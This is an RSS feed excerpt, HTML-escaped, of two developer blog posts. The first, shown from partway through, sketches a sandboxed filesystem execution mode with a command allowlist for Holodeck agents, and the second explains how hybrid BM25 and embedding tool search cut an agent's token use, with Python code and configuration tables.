    &lt;span class="na"&gt;server&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;brave-search&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;What if we added an execution mode?&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;tools&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;knowledge_search&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;vectorstore&lt;/span&gt;
    &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;index&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;product-docs&lt;/span&gt;
    &lt;span class="na"&gt;execution&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;filesystem&lt;/span&gt;              &lt;span class="c1"&gt;# NEW: execute via CLI, write to file&lt;/span&gt;
      &lt;span class="na"&gt;output_dir&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./sandbox/search&lt;/span&gt;

  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;brave_search&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;mcp&lt;/span&gt;
    &lt;span class="na"&gt;server&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;brave-search&lt;/span&gt;
    &lt;span class="na"&gt;execution&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;filesystem&lt;/span&gt;
      &lt;span class="na"&gt;output_dir&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./sandbox/web&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The agent would then call these as CLI commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;holodeck-tool knowledge_search &lt;span class="s1"&gt;'{"query": "pricing"}'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; ./sandbox/search/001.json
&lt;span class="nv"&gt;$ &lt;/span&gt;holodeck-tool brave_search &lt;span class="s1"&gt;'{"query": "competitor analysis"}'&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; ./sandbox/web/001.json
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same tool definitions for discoverability. Filesystem semantics for execution. The agent still knows what tools exist (via the tool search pattern from my previous post), but now it controls &lt;em&gt;when&lt;/em&gt; and &lt;em&gt;how much&lt;/em&gt; of the output enters context.&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Multi-Platform Support
&lt;/h3&gt;

&lt;p&gt;I'm on macOS. Most servers run Linux. Some poor souls use Windows.&lt;/p&gt;

&lt;p&gt;The goal is cross-platform support, which means:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;No macOS-specific sandboxing (sorry, &lt;code&gt;sandbox-exec&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Abstracting filesystem operations through a clean interface&lt;/li&gt;
&lt;li&gt;Probably leaning on Docker for production isolation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This is the stretch goal. I'll be happy if macOS and Linux work cleanly.&lt;/p&gt;

&lt;h2&gt;
  
  
  What This Isn't
&lt;/h2&gt;

&lt;p&gt;To be clear: this is an experiment. I'm not replacing Holodeck's core execution model with bash. The standard tool calling flow works great for most use cases, and the tool search pattern I built already handles the "too many tools" problem.&lt;/p&gt;

&lt;p&gt;What I'm building is an &lt;em&gt;additional&lt;/em&gt; capability—a &lt;code&gt;sandbox&lt;/code&gt; tool that agents can use when they need filesystem-style access for memory-intensive or retrieval-heavy tasks. Think of it as giving your agent a scratchpad with Unix superpowers.&lt;/p&gt;

&lt;p&gt;The eventual API might look something like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;tools&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;sandbox&lt;/span&gt;
    &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;sandbox&lt;/span&gt;
    &lt;span class="na"&gt;config&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="na"&gt;base_path&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./workspace&lt;/span&gt;
      &lt;span class="na"&gt;allowed_commands&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="pi"&gt;[&lt;/span&gt;&lt;span class="nv"&gt;cat&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;grep&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;ls&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;head&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;tail&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;find&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;jq&lt;/span&gt;&lt;span class="pi"&gt;,&lt;/span&gt; &lt;span class="nv"&gt;awk&lt;/span&gt;&lt;span class="pi"&gt;]&lt;/span&gt;
      &lt;span class="na"&gt;audit_log&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./logs/sandbox.log&lt;/span&gt;
      &lt;span class="na"&gt;copy_on_write&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
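&lt;p&gt;One plausible way to enforce &lt;code&gt;allowed_commands&lt;/code&gt; (a sketch against the config above; &lt;code&gt;check_command&lt;/code&gt; is a hypothetical name): parse the command line with &lt;code&gt;shlex&lt;/code&gt; and reject anything whose program isn't on the allowlist.&lt;/p&gt;

```python
import shlex

ALLOWED = {"cat", "grep", "ls", "head", "tail", "find", "jq", "awk"}

def check_command(command_line: str) -> list:
    """Parse a shell command and verify the program is allowlisted."""
    argv = shlex.split(command_line)
    if not argv:
        raise ValueError("empty command")
    program = argv[0].rsplit("/", 1)[-1]  # strip any path prefix
    if program not in ALLOWED:
        raise PermissionError(f"command not allowed: {program}")
    return argv
```

&lt;p&gt;A real execution layer would also have to split pipelines and redirections and check each segment; this only validates a single command.&lt;/p&gt;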



&lt;p&gt;But that's getting ahead of myself. Implementation is for Part 2.&lt;/p&gt;

&lt;h2&gt;
  
  
  Next Up
&lt;/h2&gt;

&lt;p&gt;In &lt;strong&gt;Part 2&lt;/strong&gt;, I'll dig into implementation details:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Setting up the sandboxed filesystem&lt;/li&gt;
&lt;li&gt;Copy-on-write semantics (probably borrowing ideas from AgentFS)&lt;/li&gt;
&lt;li&gt;The command execution layer with proper escaping and timeouts&lt;/li&gt;
&lt;li&gt;Audit logging and rollback&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Part 3&lt;/strong&gt; will cover Semantic Kernel integration—making existing tools execute in "filesystem mode" and exposing the whole thing as a Holodeck tool.&lt;/p&gt;

&lt;p&gt;If you've built something similar or have thoughts on the approach, I'd love to hear about it.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This post is part of a series on building filesystem-based agentic memory systems. Read my previous post on &lt;a href="https://dev.to/jeremiahbarias/how-i-reduced-my-agents-token-consumption-by-83-57nh"&gt;reducing token consumption with tool search&lt;/a&gt; for context on the first pattern I implemented.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>agents</category>
      <category>ai</category>
      <category>architecture</category>
      <category>bash</category>
    </item>
    <item>
      <title>How I Reduced My Agent's Token Consumption by 83%</title>
      <dc:creator>Jeremiah Justin Barias</dc:creator>
      <pubDate>Fri, 16 Jan 2026 00:00:00 +0000</pubDate>
      <link>https://dev.to/jeremiahbarias/how-i-reduced-my-agents-token-consumption-by-83-57nh</link>
      <guid>https://dev.to/jeremiahbarias/how-i-reduced-my-agents-token-consumption-by-83-57nh</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxxn2y5cottpo909gc8i3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxxn2y5cottpo909gc8i3.png" alt=" " width="800" height="446"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;(Excuse the bad meme image prompt, I'm new at this LOL)&lt;/p&gt;

&lt;h1&gt;
  
  
  How I Reduced My Agent's Token Consumption by 83%
&lt;/h1&gt;

&lt;p&gt;I was building a research agent with HoloDeck for paper search, Brave Search for web lookups, and a memory MCP server for knowledge graphs. Pretty standard stuff.&lt;/p&gt;

&lt;p&gt;Then I looked at my API call payload for a simple "hi there" message:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;{
  "messages": [...],
  "tools": [
    {"function": {"name": "vectorstore-search_papers", ...}},
    {"function": {"name": "brave_search-brave_image_search", ...}},
    {"function": {"name": "brave_search-brave_local_search", ...}},
    {"function": {"name": "brave_search-brave_news_search", ...}},
    {"function": {"name": "brave_search-brave_summarizer", ...}},
    {"function": {"name": "brave_search-brave_video_search", ...}},
    {"function": {"name": "brave_search-brave_web_search", ...}},
    {"function": {"name": "memory-add_observations", ...}},
    {"function": {"name": "memory-create_entities", ...}},
    {"function": {"name": "memory-create_relations", ...}},
    {"function": {"name": "memory-delete_entities", ...}},
    {"function": {"name": "memory-delete_observations", ...}},
    {"function": {"name": "memory-delete_relations", ...}},
    {"function": {"name": "memory-open_nodes", ...}},
    {"function": {"name": "memory-read_graph", ...}},
    {"function": {"name": "memory-search_nodes", ...}}
  ]
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;16 tools.&lt;/strong&gt; For "hi there."&lt;/p&gt;

&lt;p&gt;The Brave Search MCP server alone exposes 6 functions with verbose parameter schemas (country codes, language enums, pagination options). The memory server adds another 9. Every single request was burning tokens on tool definitions the model would never use.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Anthropic Inspiration
&lt;/h2&gt;

&lt;p&gt;Anthropic's engineering team published a &lt;a href="https://www.anthropic.com/engineering/advanced-tool-use" rel="noopener noreferrer"&gt;fantastic post on advanced tool use&lt;/a&gt; that addressed exactly this problem. Their key insight: &lt;strong&gt;don't load all tools upfront—discover them on demand.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Their numbers were compelling: a five-server MCP setup went from ~55K tokens to ~8.7K tokens. An 85% reduction.&lt;/p&gt;

&lt;p&gt;I wanted that for HoloDeck. But I'm using Microsoft's Semantic Kernel, not Claude's native tool system. So I had to figure out how to make it work.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Architecture
&lt;/h2&gt;

&lt;p&gt;Here's what I built:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;User Query
    │
    ▼
┌─────────────────────────────┐
│     ToolFilterManager       │
│  ┌───────────────────────┐  │
│  │      ToolIndex        │  │
│  │  • Tool metadata      │  │
│  │  • Embeddings         │  │
│  │  • BM25 index         │  │
│  │  • Usage tracking     │  │
│  └───────────────────────┘  │
│             │               │
│      search(query)          │
│             │               │
│             ▼               │
│    Filtered tool list       │
└─────────────────────────────┘
    │
    ▼
┌─────────────────────────────┐
│  FunctionChoiceBehavior     │
│  .Auto(filters={            │
│    "included_functions":    │
│      ["tool1", "tool2"]     │
│  })                         │
└─────────────────────────────┘
    │
    ▼
Semantic Kernel Agent Invocation
(only selected tools in context)

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Three main components:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;ToolIndex&lt;/strong&gt; - Indexes all tools from Semantic Kernel plugins with embeddings and BM25 stats&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ToolFilterManager&lt;/strong&gt; - Orchestrates filtering and integrates with SK's execution settings&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;FunctionChoiceBehavior&lt;/strong&gt; - SK's native mechanism for restricting which functions the LLM sees&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  Building the Tool Index
&lt;/h2&gt;

&lt;p&gt;The first challenge: extracting tool metadata from Semantic Kernel's plugin system. SK organizes tools as functions within plugins, so I needed to crawl that structure:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;async def build_from_kernel(
    self,
    kernel: Kernel,
    embedding_service: EmbeddingGeneratorBase | None = None,
    defer_loading_map: dict[str, bool] | None = None,
) -&amp;gt; None:
    plugins: dict[str, KernelPlugin] = getattr(kernel, "plugins", {})

    for plugin_name, plugin in plugins.items():
        functions: dict[str, KernelFunction] = getattr(plugin, "functions", {})

        for func_name, func in functions.items():
            full_name = f"{plugin_name}-{func_name}"

            # Extract description and parameters for search
            description = getattr(func, "description", "")
            parameters: list[str] = []

            func_params: list[KernelParameterMetadata] | None = getattr(
                func, "parameters", None
            )
            if func_params:
                for param in func_params:
                    if param.description:
                        parameters.append(f"{param.name}: {param.description}")

            # Create searchable metadata
            tool_metadata = ToolMetadata(
                name=func_name,
                plugin_name=plugin_name,
                full_name=full_name,
                description=description,
                parameters=parameters,
                defer_loading=(defer_loading_map or {}).get(full_name, True),
            )

            self.tools[full_name] = tool_metadata

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Each tool becomes a searchable document combining its name, plugin, description, and parameter info.&lt;/p&gt;
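&lt;p&gt;That "searchable document" might be assembled like this (a sketch of what &lt;code&gt;_create_searchable_text&lt;/code&gt; could do; the actual method may differ):&lt;/p&gt;

```python
from dataclasses import dataclass, field

@dataclass
class ToolMetadata:
    name: str
    plugin_name: str
    full_name: str
    description: str
    parameters: list = field(default_factory=list)

def create_searchable_text(tool: ToolMetadata) -> str:
    """Flatten a tool's metadata into one string for embedding and BM25."""
    parts = [tool.full_name, tool.plugin_name, tool.name, tool.description]
    parts.extend(tool.parameters)
    return " ".join(p for p in parts if p)
```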

&lt;h2&gt;
  
  
  Three Search Methods
&lt;/h2&gt;

&lt;p&gt;I implemented three ways to find relevant tools:&lt;/p&gt;

&lt;h3&gt;
  
  
  1. Semantic Search (Embeddings)
&lt;/h3&gt;

&lt;p&gt;The obvious choice. Embed the query, embed the tools, compute cosine similarity:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;async def _semantic_search(
    self, query: str, embedding_service: EmbeddingGeneratorBase | None
) -&amp;gt; list[tuple[ToolMetadata, float]]:
    if embedding_service is None:
        return []

    # Generate query embedding
    query_embeddings = await embedding_service.generate_embeddings([query])
    query_embedding = list(query_embeddings[0])

    results: list[tuple[ToolMetadata, float]] = []
    for tool in self.tools.values():
        if tool.embedding:
            score = _cosine_similarity(query_embedding, tool.embedding)
            results.append((tool, score))

    return results

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Good for understanding intent. "Find information about refunds" matches &lt;code&gt;get_return_policy&lt;/code&gt; even though they share no keywords. Scores range from 0.0 to 1.0, with good matches typically in the &lt;strong&gt;0.4-0.6 range&lt;/strong&gt;.&lt;/p&gt;
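&lt;p&gt;The &lt;code&gt;_cosine_similarity&lt;/code&gt; helper is just the standard formula; a self-contained version might look like this (sketch, not the exact Holodeck code):&lt;/p&gt;

```python
import math

def cosine_similarity(a: list, b: list) -> float:
    """Dot product of two vectors divided by the product of their norms."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)
```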

&lt;h3&gt;
  
  
  2. BM25 (Keyword Matching)
&lt;/h3&gt;

&lt;p&gt;Classic information retrieval using &lt;a href="https://dl.acm.org/doi/10.1561/1500000019" rel="noopener noreferrer"&gt;BM25&lt;/a&gt; (Robertson &amp;amp; Zaragoza, 2009). Sometimes you want exact matches:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def _bm25_score_single(self, query: str, tool: ToolMetadata) -&amp;gt; float:
    query_tokens = _tokenize(query)
    doc_tokens = _tokenize(self._create_searchable_text(tool))

    # Count term frequencies
    term_freq: dict[str, int] = {}
    for token in doc_tokens:
        term_freq[token] = term_freq.get(token, 0) + 1

    score = 0.0
    for term in query_tokens:
        if term not in term_freq:
            continue

        tf = term_freq[term]
        idf = self._idf_cache.get(term, 0.0)

        # BM25 formula
        numerator = tf * (self._BM25_K1 + 1)
        denominator = tf + self._BM25_K1 * (
            1 - self._BM25_B + self._BM25_B * doc_length / self._avg_doc_length
        )
        score += idf * (numerator / denominator)

    return score

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Fast, no embeddings needed. Great for technical terms: "brave_search" should definitely match tools from the Brave Search plugin.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Important gotcha:&lt;/strong&gt; The tokenizer must split on underscores! Tool names like &lt;code&gt;brave_web_search&lt;/code&gt; need to tokenize as &lt;code&gt;["brave", "web", "search"]&lt;/code&gt;, not as a single token. Otherwise queries containing "web" won't match the tool. I learned this the hard way when "find papers on the web" was returning &lt;code&gt;brave_image_search&lt;/code&gt; instead of &lt;code&gt;brave_web_search&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def _tokenize(text: str) -&amp;gt; list[str]:
    # Use [a-zA-Z0-9]+ to split on underscores (not \w+ which includes them)
    tokens = re.findall(r"[a-zA-Z0-9]+", text.lower())
    return tokens

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  3. Hybrid (Reciprocal Rank Fusion)
&lt;/h3&gt;

&lt;p&gt;Why choose? Combine both with &lt;a href="https://dl.acm.org/doi/10.1145/1571941.1572114" rel="noopener noreferrer"&gt;Reciprocal Rank Fusion&lt;/a&gt; (Cormack et al., 2009):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;async def _hybrid_search(
    self, query: str, embedding_service: EmbeddingGeneratorBase | None
) -&amp;gt; list[tuple[ToolMetadata, float]]:
    semantic_results = await self._semantic_search(query, embedding_service)
    bm25_results = self._bm25_search(query)

    # Reciprocal Rank Fusion
    k = 60 # Constant from the original paper
    rrf_scores: dict[str, float] = {}

    semantic_sorted = sorted(semantic_results, key=lambda x: x[1], reverse=True)
    for rank, (tool, _) in enumerate(semantic_sorted):
        rrf_scores[tool.full_name] = rrf_scores.get(tool.full_name, 0.0) + 1 / (k + rank + 1)

    bm25_sorted = sorted(bm25_results, key=lambda x: x[1], reverse=True)
    for rank, (tool, _) in enumerate(bm25_sorted):
        rrf_scores[tool.full_name] = rrf_scores.get(tool.full_name, 0.0) + 1 / (k + rank + 1)

    # Normalize to 0-1 range (raw RRF scores are ~0.01-0.03)
    max_score = max(rrf_scores.values()) if rrf_scores else 1.0
    normalized = {name: score / max_score for name, score in rrf_scores.items()}

    return [(self.tools[name], score) for name, score in normalized.items()]

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;RRF rewards tools that rank highly in &lt;strong&gt;both&lt;/strong&gt; methods without being dominated by either's raw scores.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Critical detail:&lt;/strong&gt; Raw RRF scores are tiny (0.01-0.03 range) because of the formula &lt;code&gt;1/(k+rank+1)&lt;/code&gt; with k=60. If you apply a &lt;code&gt;similarity_threshold&lt;/code&gt; of 0.3 to raw scores, &lt;em&gt;everything&lt;/em&gt; gets filtered out! You must normalize RRF scores to 0-1 range by dividing by the max score. After normalization, good matches score &lt;strong&gt;0.8-1.0&lt;/strong&gt;.&lt;/p&gt;
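&lt;p&gt;A quick numeric check shows why (k=60): even a tool ranked first in &lt;em&gt;both&lt;/em&gt; lists only scores 2/61, about 0.033, so any absolute threshold near 0.3 wipes out everything until you divide by the max.&lt;/p&gt;

```python
def rrf_contribution(rank: int, k: int = 60) -> float:
    """Reciprocal Rank Fusion contribution for a zero-based rank."""
    return 1 / (k + rank + 1)

# best possible raw score: rank 0 in both semantic and BM25 lists
best_raw = rrf_contribution(0) + rrf_contribution(0)  # about 0.0328
# a tool ranked 4th in both lists
mid_raw = rrf_contribution(4) + rrf_contribution(4)   # about 0.0308
# after dividing by the max, scores land in a usable 0-1 range
normalized_mid = mid_raw / best_raw                   # about 0.94
```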

&lt;h2&gt;
  
  
  The Semantic Kernel Integration
&lt;/h2&gt;

&lt;p&gt;Semantic Kernel has a &lt;code&gt;FunctionChoiceBehavior&lt;/code&gt; class that controls which functions the LLM can call. It supports a &lt;code&gt;filters&lt;/code&gt; parameter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def create_function_choice_behavior(
    self, filtered_tools: list[str]
) -&amp;gt; FunctionChoiceBehavior:
    return FunctionChoiceBehavior.Auto(
        filters={"included_functions": filtered_tools}
    )

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;That's it. Pass in a list of tool names, and SK only sends those tool definitions to the LLM.&lt;/p&gt;

&lt;p&gt;The manager wires it all together:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;async def prepare_execution_settings(
    self,
    query: str,
    base_settings: PromptExecutionSettings,
) -&amp;gt; PromptExecutionSettings:
    if not self.config.enabled:
        return base_settings

    # Filter tools based on query
    filtered_tools = await self.filter_tools(query)

    # Create behavior with only filtered tools
    function_choice = self.create_function_choice_behavior(filtered_tools)

    # Clone settings and attach filtered behavior
    cloned = self._clone_settings(base_settings)
    cloned.function_choice_behavior = function_choice

    return cloned

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Configuration
&lt;/h2&gt;

&lt;p&gt;I made it all YAML-configurable because that's the HoloDeck way:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;tool_filtering:
  enabled: true
  top_k: 5 # Max tools per request
  similarity_threshold: 0.5 # Minimum score for inclusion
  always_include:
    - search_papers # Critical tools always available
  always_include_top_n_used: 0 # Disable until usage patterns stabilize
  search_method: hybrid # Options: semantic, bm25, hybrid

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Sensible Defaults
&lt;/h3&gt;

&lt;p&gt;Here's what I recommend starting with:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Parameter&lt;/th&gt;
&lt;th&gt;Default&lt;/th&gt;
&lt;th&gt;Rationale&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;top_k&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;5&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Enough tools for most tasks without token bloat&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;similarity_threshold&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0.5&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Include tools at least 50% as relevant as top result&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;always_include&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;[]&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Agent-specific—add your critical tools here&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;always_include_top_n_used&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;0&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Avoid early usage bias; enable after patterns stabilize&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;search_method&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;hybrid&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Best of semantic + keyword matching&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Threshold Tuning by Search Method
&lt;/h3&gt;

&lt;p&gt;All search methods now return normalized scores in the 0-1 range, making the &lt;code&gt;similarity_threshold&lt;/code&gt; consistent across methods:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Method&lt;/th&gt;
&lt;th&gt;Good Match Range&lt;/th&gt;
&lt;th&gt;Recommended Threshold&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;semantic&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;0.4 - 0.6&lt;/td&gt;
&lt;td&gt;0.3 - 0.4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;bm25&lt;/strong&gt; (normalized)&lt;/td&gt;
&lt;td&gt;0.8 - 1.0&lt;/td&gt;
&lt;td&gt;0.5 - 0.6&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;strong&gt;hybrid&lt;/strong&gt; (normalized)&lt;/td&gt;
&lt;td&gt;0.8 - 1.0&lt;/td&gt;
&lt;td&gt;0.5 - 0.6&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;A threshold of 0.5 means "include tools scoring at least 50% of what the top result scores." This filters out clearly irrelevant tools while keeping useful ones.&lt;/p&gt;

&lt;h3&gt;
  
  
  Configuration Knobs
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;top_k&lt;/strong&gt; : How many tools max per request&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;similarity_threshold&lt;/strong&gt; : Below this score, tools get filtered out&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;always_include&lt;/strong&gt; : Your core tools that should always be available&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;always_include_top_n_used&lt;/strong&gt; : Adaptive optimization—frequently used tools stay in context. &lt;strong&gt;Caution:&lt;/strong&gt; This tracks usage across requests, so early/accidental tool calls can bias future filtering. Keep at 0 during development.&lt;/li&gt;
&lt;/ul&gt;
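&lt;p&gt;As a rough sketch of how these knobs interact (illustrative only — the function name, signature, and score format here are assumptions, not HoloDeck's actual API):&lt;/p&gt;

```python
def select_tools(scores, top_k=5, similarity_threshold=0.5, always_include=()):
    """Keep tools scoring at least `similarity_threshold` times the top score,
    cap the list at `top_k`, then union in the always-available tools."""
    if not scores:
        return list(always_include)
    top = max(scores.values())
    ranked = sorted(scores.items(), key=lambda kv: kv[1], reverse=True)
    selected = [name for name, score in ranked
                if top > 0 and score / top >= similarity_threshold][:top_k]
    # always_include acts as a safety net regardless of relevance scores
    selected += [name for name in always_include if name not in selected]
    return selected
```

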